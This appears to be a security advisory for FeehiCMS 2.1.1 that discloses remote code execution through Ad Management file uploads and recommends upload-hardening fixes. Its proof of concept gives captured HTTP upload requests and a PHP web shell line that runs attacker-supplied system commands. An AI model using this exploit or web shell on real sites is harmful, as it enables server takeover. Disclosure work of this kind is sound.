FeehiCMS version 2.1.1 - Remote Code Execution via Unrestricted File Upload in Ad Management #78
Description
[Remote Code Execution via Unrestricted File Upload in Ad Management]
Severity Score: Medium
CVSS Score: 9.6 Critical, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
Description
FeehiCMS version 2.1.1 allows authenticated remote attackers to upload files that the server later executes (or stores in an executable location) without sufficient validation, sanitization, or execution restrictions. An authenticated remote attacker can upload a crafted PHP file and cause the application or web server to execute it, resulting in remote code execution (RCE).
Impact
Successful exploit allows authenticated remote attacker to run arbitrary system code in the remote server.
POC
Login as a backend user. Navigate to Ad Management.
Upload a JPEG file and intercept the request.
POST /admin/index.php?r=ad%2Fupdate&id=28 HTTP/1.1
Host: localhost:8081
Content-Length: 1538
Cache-Control: max-age=0
sec-ch-ua: "Not=A?Brand";v="24", "Chromium";v="140"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: http://localhost:8081
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypK0eH5nAvIbNsDBe
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost:8081/admin/index.php?r=ad%2Fupdate&id=28
Accept-Encoding: gzip, deflate, br
Cookie: BACKEND_FEEHICMS=5440ac6b677107979c81bba2e1725e94; _csrf_backend=aa1a406cf3605aa65a70ffdc74b2d296fb53c6a3e287c4db4b55e5635b144f0ca%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22imys3cRYiJYJLd36o-GVC8Zqp3Ml3Tyy%22%3B%7D; PHPSESSID=26fb8e4f9ee735093815221c4fc419fe; _identity=36b1340757dfa97b272930f316919bab2d038b7d849034c6306a06aa8f16e92aa%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22CDtE4877YiX55NQ_UTVXh8DhQ5TZjCKH%22%2C2592000%5D%22%3B%7D; _csrf=bb4f8d35c63f1529608814ced457ad3587f68ab334853e5bb2047aed56f7bbc1a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%223ZCnqhasM7_8OcwWLHzGTsw5PqXitHu-%22%3B%7D
Connection: keep-alive------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="_csrf_backend"zSOUf0esoGIwUYyGdhiTFfDJXSQ3rUwfetdh4Zy7B4WkTu0MdM_yO1kb1cw6fKAjn-QacnSVFm4K5CyNr-9-_A==
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[name]"aaa
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[tips]"aa
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[input_type]"1
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[ad]"0
**> ------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[ad]"; filename="2.jpeg"
Content-Type: image/jpegasdasdsa**
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[link]"aa
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[desc]"aa
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[target]"------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[target]"_blank
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[sort]"0
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[autoload]"------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[autoload]"1
------WebKitFormBoundarypK0eH5nAvIbNsDBe--
Modify the following.
File extension: jpeg --> php
Modify the file content to <?php system($_GET['cmd']); ?>.
POST /admin/index.php?r=ad%2Fupdate&id=28 HTTP/1.1
Host: localhost:8081
Content-Length: 1541
Cache-Control: max-age=0
sec-ch-ua: "Not=A?Brand";v="24", "Chromium";v="140"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: http://localhost:8081
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypK0eH5nAvIbNsDBe
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost:8081/admin/index.php?r=ad%2Fupdate&id=28
Accept-Encoding: gzip, deflate, br
Cookie: BACKEND_FEEHICMS=5440ac6b677107979c81bba2e1725e94; _csrf_backend=aa1a406cf3605aa65a70ffdc74b2d296fb53c6a3e287c4db4b55e5635b144f0ca%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22imys3cRYiJYJLd36o-GVC8Zqp3Ml3Tyy%22%3B%7D; PHPSESSID=26fb8e4f9ee735093815221c4fc419fe; _identity=36b1340757dfa97b272930f316919bab2d038b7d849034c6306a06aa8f16e92aa%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22CDtE4877YiX55NQ_UTVXh8DhQ5TZjCKH%22%2C2592000%5D%22%3B%7D; _csrf=bb4f8d35c63f1529608814ced457ad3587f68ab334853e5bb2047aed56f7bbc1a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%223ZCnqhasM7_8OcwWLHzGTsw5PqXitHu-%22%3B%7D
Connection: keep-alive------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="_csrf_backend"zSOUf0esoGIwUYyGdhiTFfDJXSQ3rUwfetdh4Zy7B4WkTu0MdM_yO1kb1cw6fKAjn-QacnSVFm4K5CyNr-9-_A==
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[name]"aaa
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[tips]"aa
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[input_type]"1
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[ad]"0
**
**> ------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[ad]"; filename="2.php"
Content-Type: application/octet-stream------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[link]"aa
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[desc]"aa
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[target]"------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[target]"_blank
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[sort]"0
------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[autoload]"------WebKitFormBoundarypK0eH5nAvIbNsDBe
Content-Disposition: form-data; name="AdForm[autoload]"1
------WebKitFormBoundarypK0eH5nAvIbNsDBe--
In the backend server, observe the uploaded file path.
Open the path in the browser, and run the system commands.
Remediation
- Strict Allowlist of File Types. Only accept specific, necessary file types (e.g., .pdf) and reject everything else. Validate by file-signature (magic bytes), not by extension or client MIME type.
- Store Outside Webroot & Non-Executable Storage. Persist uploaded files to locations that are not served or executed by the web server. Ensure uploaded directories are mounted with “noexec” where supported; set file permissions to disallow execution.
- Server-Side Content Validation and Sanitization. Inspect file contents for embedded code or script tags. Perform content scanning (static and antivirus). Normalize and sanitize filenames; generate server-side names (e.g., UUIDs) to avoid control characters or path traversal.